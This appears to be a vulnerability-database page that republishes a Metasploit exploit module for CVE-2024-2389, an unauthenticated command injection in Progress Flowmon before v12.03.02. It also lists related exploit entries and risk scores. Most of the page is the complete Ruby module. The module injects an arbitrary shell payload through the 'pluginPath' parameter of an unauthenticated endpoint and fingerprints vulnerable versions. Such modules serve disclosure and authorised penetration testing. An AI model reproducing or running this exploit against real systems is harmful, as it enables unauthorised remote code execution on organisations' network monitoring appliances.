Flowmon Unauthenticated Command Injection

🗓️ 29 May 2024 00:00:00Reported by Dave Yesland, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 349 Views

Flowmon Unauthenticated Command Injection vulnerability in Progress Flowmon versions before v12.03.02

Reporter	Title	Published	Views	Family All 21
0day.today	Flowmon Unauthenticated Command Injection Exploit	29 May 202400:00	–	zdt
0day.today	Progress Flowmon 12.3.5 Local sudo Privilege Escalation Exploit	2 Jun 202400:00	–	zdt
0day.today	Flowmon Unauthenticated Command Injection Exploit	2 Jun 202400:00	–	zdt
Circl	CVE-2024-2389	5 Apr 202412:00	–	circl
CNNVD	Progress Flowmon 操作系统命令注入漏洞	2 Apr 202400:00	–	cnnvd
CVE	CVE-2024-2389	2 Apr 202412:22	–	cve
Cvelist	CVE-2024-2389 Flowmon Unauthenticated Command Injection Vulnerability	2 Apr 202412:22	–	cvelist
Kitploit	CVE-2024-23897 - Jenkins <= 2.441 & <= LTS 2.426.2 PoC And Scanner	25 Feb 202411:30	–	kitploit
Metasploit	Flowmon Unauthenticated Command Injection	29 May 202419:55	–	metasploit
Metasploit	Progress Flowmon Local sudo privilege escalation	29 May 202419:55	–	metasploit

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Flowmon Unauthenticated Command Injection',  
'Description' => %q{  
This module exploits an unauthenticated command injection vulnerability in Progress Flowmon  
versions before v12.03.02.  
},  
'Author' => [  
'Dave Yesland with Rhino Security Labs',  
],  
'License' => MSF_LICENSE,  
'References' => [  
['CVE', '2024-2389'],  
['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'],  
['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']  
],  
'DisclosureDate' => '2024-04-23',  
'Notes' => {  
'Stability' => [ CRASH_SAFE ],  
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],  
'Reliability' => [ REPEATABLE_SESSION ]  
},  
'Platform' => ['unix', 'linux'],  
'Arch' => [ARCH_CMD],  
'Targets' => [['Automatic', {}]],  
'Privileged' => false,  
'DefaultOptions' => {  
'SSL' => true,  
'RPORT' => 443  
}  
)  
)  
  
register_options([  
OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/'])  
])  
end  
  
def execute_command(cmd)  
send_request_cgi(  
'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'),  
'method' => 'GET',  
'vars_get' => {  
'file' => rand_text_alphanumeric(8),  
'lang' => rand_text_alphanumeric(8),  
'pluginPath' => "$(#{cmd})"  
}  
)  
end  
  
def exploit  
print_status('Attempting to execute payload...')  
execute_command(payload.encoded)  
end  
  
def check  
print_status("Checking if #{peer} can be exploited!")  
  
uri = normalize_uri(target_uri.path, 'homepage/auth/login')  
res = send_request_cgi(  
'uri' => uri,  
'method' => 'GET'  
)  
  
return CheckCode::Unknown('Connection failed') unless res  
return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_html_document.xpath('//title').text == 'Flowmon Web Interface'  
  
# Use a regular expression to extract the version number from the response  
version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)})  
  
return CheckCode::Unknown('Unable to determine the version from the favicon link.') unless version && version[1]  
  
print_status("Detected version: #{version[1]}")  
  
if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02')  
CheckCode::Vulnerable("Version #{version[1]} is vulnerable.")  
else  
CheckCode::Safe("Version #{version[1]} is not vulnerable.")  
end  
end  
end  
`

29 May 2024 00:00Current

7High risk

Vulners AI Score7

EPSS0.94353